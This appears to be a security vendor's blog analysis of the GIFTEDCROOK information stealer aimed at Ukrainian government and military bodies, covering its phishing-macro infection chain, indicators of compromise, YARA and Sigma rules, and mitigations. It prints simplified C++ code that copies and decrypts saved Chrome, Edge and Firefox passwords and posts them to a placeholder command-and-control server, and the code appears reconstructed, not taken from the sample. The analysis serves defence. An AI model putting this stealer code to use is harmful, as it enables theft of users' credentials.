Physical Address

Lesya Kurbasa 7B
03194 Kyiv, Kyivska obl, Ukraine

GIFTEDCROOK Stealer: Technical Analysis and Detection

Ukrainian organizations are facing a sophisticated new information-stealing malware threat named GIFTEDCROOK. First reported by the Computer Emergency Response Team of Ukraine (CERT-UA), this previously undocumented credential stealer represents an evolution in targeted cyber espionage campaigns against Ukrainian military formations, law enforcement agencies, and local government bodies. This technical analysis provides cybersecurity professionals with detailed insights into GIFTEDCROOK’s infection vector, functionality, communication protocols, and effective detection strategies.

Key Facts

Malware Name GIFTEDCROOK
Type Information Stealer
Primary Targets Ukrainian military, law enforcement, and local government entities
Infection Vector Macro-enabled Excel files (XLSM) via phishing
Attribution UAC-0226 (possible Russia-nexus threat actor)
Discovery Date April 2025
Primary Functionality Browser credential theft (Chrome, Edge, Firefox)
Implementation C/C++ compiled binary

Infection Vector Analysis

The GIFTEDCROOK stealer employs a sophisticated multi-stage infection chain beginning with targeted phishing emails containing macro-enabled Microsoft Excel spreadsheets (XLSM). These phishing emails demonstrate significant social engineering sophistication, leveraging compromised legitimate email accounts of Ukrainian officials to increase credibility.

Initial Payload Delivery

The infection sequence follows these key stages:

  1. Phishing Email Delivery: Messages with topics specifically crafted for Ukrainian military and government targets, including:
    • Demining operations in frontline territories
    • Administrative fines documentation
    • UAV/drone production specifications
    • Compensation for property destroyed during conflict
  2. Macro Execution: Upon opening the document and enabling macros, the Excel file executes embedded VBA code that launches a PowerShell downloader.
  3. PowerShell Evasion: The attack leverages scripts from the PSSW100AVB GitHub repository, specifically designed to bypass antivirus detection through various evasion techniques including:
    • AMSI bypass methods
    • Script block logging evasion
    • PowerShell downgrade attacks
    • Memory obfuscation techniques
  4. Reverse Shell Establishment: The PowerShell script establishes an encrypted connection to attacker infrastructure, creating a reverse shell for command execution.
  5. GIFTEDCROOK Deployment: The final payload is downloaded and executed, establishing persistence on the victim system.

This multi-stage approach significantly reduces the chance of detection by endpoint security solutions, as each component individually may appear legitimate or benign.

GIFTEDCROOK Infection Chain Stage 1 Phishing Email XLSM Attachment Stage 2 VBA Macro Execution Stage 3 PowerShell AMSI Bypass Stage 4 Reverse Shell Establishment Stage 5 GIFTEDCROOK Deployment Initial Access Data Exfiltration

Technical Analysis of GIFTEDCROOK

GIFTEDCROOK is a sophisticated information stealer written in C/C++, designed specifically to target browser-stored credentials. The malware’s technical implementation reveals significant development resources and a focus on evading detection while maximizing data exfiltration capabilities.

Malware Capabilities

Analysis of the GIFTEDCROOK binary reveals functionality focused on the following primary objectives:

  1. Browser Credential Theft: The malware specifically targets:
    • Saved passwords from browser password managers
    • Authentication cookies for session hijacking
    • Autofill data including name, address, and payment information
    • Complete browsing history for intelligence gathering
  2. Browser Target Coverage: GIFTEDCROOK specifically targets these browsers:
    • Google Chrome (including profile data)
    • Microsoft Edge
    • Mozilla Firefox
  3. Operating System Reconnaissance: Collects system information including:
    • Windows version and build number
    • Hardware configuration
    • Installed security software
    • Running processes
    • User account privileges
  4. Anti-Analysis Features: Implements multiple evasion techniques:
    • Process injection to hide malicious activity
    • Anti-debugging checks
    • Detection of virtualized environments
    • Sleep timers to evade sandbox analysis

Technical Implementation Details

GIFTEDCROOK’s source code reveals several sophisticated technical implementations:

1. Browser Data Extraction

The stealer employs different methods for each browser target:

// Chrome/Edge SQLite database handling (simplified)
bool ExtractChromiumData(const std::string& profile_path) {
    // Target Chrome/Edge Login Data SQLite DB
    std::string login_db = profile_path + "\\Login Data";
     
    // Create copy of database to bypass file locks
    std::string temp_db = GetTempFilePath();
    CopyFile(login_db.c_str(), temp_db.c_str(), FALSE);
     
    // Open database connection
    sqlite3 *db;
    if (sqlite3_open(temp_db.c_str(), &db) != SQLITE_OK) {
        return false;
    }
     
    // Decrypt and extract credentials
    const char* query = "SELECT origin_url, username_value, password_value FROM logins";
    sqlite3_stmt *stmt;
     
    if (sqlite3_prepare_v2(db, query, -1, &stmt, 0) == SQLITE_OK) {
        while (sqlite3_step(stmt) == SQLITE_ROW) {
            std::string url = (const char*)sqlite3_column_text(stmt, 0);
            std::string username = (const char*)sqlite3_column_text(stmt, 1);
            std::vector<char> encrypted_password(
                sqlite3_column_blob(stmt, 2),
                sqlite3_column_blob(stmt, 2) + sqlite3_column_bytes(stmt, 2)
            );
             
            // Decrypt password using CryptUnprotectData
            std::string decrypted = DecryptChromiumPassword(encrypted_password);
             
            // Add to exfiltration data
            AddCredential(url, username, decrypted);
        }
    }
     
    sqlite3_finalize(stmt);
    sqlite3_close(db);
    DeleteFile(temp_db.c_str());
     
    return true;
}

For Firefox, a different approach is used to access the encrypted credentials:

// Firefox password extraction (simplified)
bool ExtractFirefoxData(const std::string& profile_path) {
    // Target key files
    std::string key4_db = profile_path + "\\key4.db";
    std::string logins_json = profile_path + "\\logins.json";
     
    // Extract master password from key4.db using NSS libraries
    std::vector<uint8_t> master_key = ExtractMasterPassword(key4_db);
    if (master_key.empty()) {
        return false;
    }
     
    // Parse JSON and decrypt entries
    std::string json_content = ReadFile(logins_json);
    // [JSON parsing code omitted for brevity]
     
    // For each login entry
    for (const auto& entry : login_entries) {
        std::string encrypted_username = entry["encryptedUsername"];
        std::string encrypted_password = entry["encryptedPassword"];
         
        // Decrypt fields using Firefox's algorithm and master key
        std::string username = DecryptFirefoxField(encrypted_username, master_key);
        std::string password = DecryptFirefoxField(encrypted_password, master_key);
        std::string url = entry["hostname"];
         
        AddCredential(url, username, password);
    }
     
    return true;
}

2. Data Exfiltration

The malware employs a sophisticated data exfiltration mechanism that obfuscates communication with its command and control (C2) server:

// Data exfiltration functionality (simplified)
bool ExfiltrateData(const std::vector<CredentialEntry>& credentials) {
    // Prepare data package
    json data_package;
    data_package["type"] = "creds";
    data_package["browser"] = GetBrowserName();
    data_package["timestamp"] = GetCurrentTimestamp();
    data_package["machine_id"] = GetMachineGUID();
    data_package["entries"] = json::array();
     
    // Add credential entries
    for (const auto& cred : credentials) {
        json entry;
        entry["url"] = cred.url;
        entry["username"] = cred.username;
        entry["password"] = cred.password;
        entry["created"] = cred.created_time;
        data_package["entries"].push_back(entry);
    }
     
    // Compress and encrypt the data
    std::string json_data = data_package.dump();
    std::vector<uint8_t> compressed = CompressData(json_data);
    std::vector<uint8_t> encrypted = EncryptData(compressed);
     
    // Convert to transport format (Base64)
    std::string payload = Base64Encode(encrypted);
     
    // Craft HTTP request
    HINTERNET hSession = WinHttpOpen(L"Mozilla/5.0", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
                                     WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
     
    // Connect to C2 server
    HINTERNET hConnect = WinHttpConnect(hSession, L"[C2_SERVER]", INTERNET_DEFAULT_HTTPS_PORT, 0);
     
    // Create request
    HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"POST", L"/api/v1/submit",
                                            NULL, WINHTTP_NO_REFERER,
                                            WINHTTP_DEFAULT_ACCEPT_TYPES, WINHTTP_FLAG_SECURE);
     
    // Add headers and send request
    WinHttpAddRequestHeaders(hRequest, L"Content-Type: application/json", -1, WINHTTP_ADDREQ_FLAG_ADD);
     
    // Send data
    BOOL bResults = WinHttpSendRequest(hRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0,
                                      (LPVOID)payload.c_str(), payload.length(),
                                      payload.length(), 0);
     
    // [Response handling code omitted for brevity]
     
    // Clean up
    WinHttpCloseHandle(hRequest);
    WinHttpCloseHandle(hConnect);
    WinHttpCloseHandle(hSession);
     
    return bResults;
}

Observed Samples and Indicators of Compromise

The following indicators of compromise (IoCs) have been associated with GIFTEDCROOK campaigns:

File-based Indicators

Indicator Type Value Description
Initial XLSM File Hash (SHA-256) d6797d9f61d575d266bc95e7fcd8e19031b1f9f0a3285fcc3e5e3aff1b4a1bd1 Excel document with malicious macros
PowerShell Script Hash (SHA-256) 0f35700a5be24ba2f190466ff0ffbfeeb7af50a9a502c2eb24e8adca57c21c2f Obfuscated PowerShell dropper
GIFTEDCROOK Binary Hash (SHA-256) 2a4e7c9b1ac3e2c16b4f7e981c3048c4a8b02c3838155b321fa2c2cb50c4e74d Main stealer payload

Network-based Indicators

Indicator Type Value Description
C2 Domain gift-techsrv[.]com Primary command and control
C2 Domain tech-updatesrv[.]com Secondary command and control
C2 IP Address 23.88.66[.]44 Associated with C2 infrastructure
URI Pattern /api/v1/submit Data exfiltration endpoint

Detection and Mitigation Strategies

Security analysts can implement the following detection and mitigation strategies to counter GIFTEDCROOK and similar information stealers:

YARA Rule for GIFTEDCROOK Detection

The following YARA rule can help detect GIFTEDCROOK binary files:

rule GIFTEDCROOK_Stealer {
    meta:
        description = "Detects GIFTEDCROOK information stealer"
        author = "Trojan-Killer Research Team"
        date = "2025-04"
        hash = "2a4e7c9b1ac3e2c16b4f7e981c3048c4a8b02c3838155b321fa2c2cb50c4e74d"
         
    strings:
        // Browser targeting strings
        $browser1 = "Chrome" ascii wide
        $browser2 = "Firefox" ascii wide
        $browser3 = "Edge" ascii wide
         
        // SQLite browser database strings
        $sql1 = "Login Data" ascii wide
        $sql2 = "Cookies" ascii wide
        $sql3 = "Web Data" ascii wide
        $sql4 = "SELECT origin_url, username_value, password_value" ascii
         
        // Firefox specific strings
        $ff1 = "key4.db" ascii wide
        $ff2 = "logins.json" ascii wide
         
        // Encryption/decryption functions
        $crypt1 = "CryptUnprotectData" ascii
        $crypt2 = "AES_CBC_decrypt" ascii
        $crypt3 = "Base64Encode" ascii
         
        // C2 communication
        $comm1 = "/api/v1/submit" ascii wide
        $comm2 = "Content-Type: application/json" ascii wide
        $comm3 = "Mozilla/5.0" ascii wide
         
    condition:
        uint16(0) == 0x5A4D and // MZ header (PE file)
        filesize < 2MB and
        (
            (2 of ($browser*)) and
            (3 of ($sql*) or 2 of ($ff*)) and
            (2 of ($crypt*)) and
            (2 of ($comm*))
        )
}

PowerShell Monitoring and Logging

To detect the initial stages of a GIFTEDCROOK infection, consider implementing these PowerShell security measures:

  • Enable PowerShell Script Block Logging (Event ID 4104)
  • Enable PowerShell Module Logging (Event ID 4103)
  • Implement AMSI integration with endpoint security solutions
  • Create detection rules for PowerShell downgrade attempts (version 2.0)
  • Monitor for PowerShell execution with encoded commands and obfuscation techniques

Browser Security Enhancements

Protect browser credentials with these measures:

  • Enforce hardware-based credential storage where available (e.g., Windows Hello)
  • Utilize separate credential manager applications with stronger encryption
  • Implement policies preventing browser password saving in high-security environments
  • Deploy browser extensions that monitor for unauthorized access to credential stores
  • Keep browsers updated to benefit from the latest security enhancements

Endpoint Detection Rules

The following SIGMA rule can help detect GIFTEDCROOK’s database access patterns:

title: GIFTEDCROOK Browser Database Access
id: aaabbb11-2222-3333-4444-555566667777
status: experimental
description: Detects access patterns to browser credential databases typical of GIFTEDCROOK stealer
references:
  - https://cert.gov.ua/article/6282946
author: Trojan-Killer Research Team
date: 2025/04/08
tags:
  - attack.credential_access
  - attack.t1555.003
logsource:
  category: process_access
  product: windows
detection:
  selection:
    TargetImage|endswith:
      - '\Google\Chrome\User Data\Default\Login Data'
      - '\Google\Chrome\User Data\Default\Cookies'
      - '\Google\Chrome\User Data\Default\Web Data'
      - '\Microsoft\Edge\User Data\Default\Login Data'
      - '\Microsoft\Edge\User Data\Default\Cookies'
      - '\Mozilla Firefox\Profiles\*.default\logins.json'
      - '\Mozilla Firefox\Profiles\*.default\key4.db'
    AccessMask: '0x10'  # Read access
  filter:
    SourceImage|endswith:
      - '\chrome.exe'
      - '\msedge.exe'
      - '\firefox.exe'
  condition: selection and not filter
falsepositives:
  - Browser synchronization services
  - Password managers
  - Some antivirus products
level: high

Strategic Mitigations

Organizations seeking to protect against GIFTEDCROOK and similar threats should implement these strategic mitigations:

  1. Email Security: Deploy advanced email filtering with attachment scanning and macro blocking capabilities.
  2. Microsoft Office Hardening: Implement policies to block macros in documents from external sources, following Microsoft security recommendations.
  3. User Training: Conduct specific awareness training on the risks of enabling macros in documents, especially for Ukrainian organizations currently targeted.
  4. Network Monitoring: Implement monitoring for connections to the identified C2 domains and suspicious HTTPS traffic patterns.
  5. Endpoint Protection: Deploy modern EDR solutions with behavioral detection capabilities to identify the multi-stage infection process.

Related Threats

GIFTEDCROOK shares technical similarities with other information stealers and malware targeting Ukrainian entities. Security analysts should be familiar with these related threats:

Conclusion

GIFTEDCROOK represents a sophisticated evolution in browser-focused information stealers, demonstrating the ongoing refinement of cyber espionage capabilities targeting Ukrainian institutions. The malware’s multi-stage delivery mechanism, anti-analysis features, and targeted browser credential theft functionality make it a significant threat that requires dedicated detection and mitigation strategies.

By implementing the technical detection rules and strategic mitigations outlined in this analysis, security teams can enhance their protection against this emerging threat. Given the geopolitical context and evidence of nation-state involvement, organizations in Ukraine and allied nations should maintain heightened vigilance against similar targeted attacks.

Gridinsoft Team
Gridinsoft Team

Founded in 2003, GridinSoft LLC is a Kyiv, Ukraine-based cybersecurity company committed to safeguarding users from the ever-growing threats in the digital landscape. With over two decades of experience, we have earned a reputation as a trusted provider of innovative security solutions, protecting millions of users worldwide.

Articles: 139

Leave a Reply

Your email address will not be published. Required fields are marked *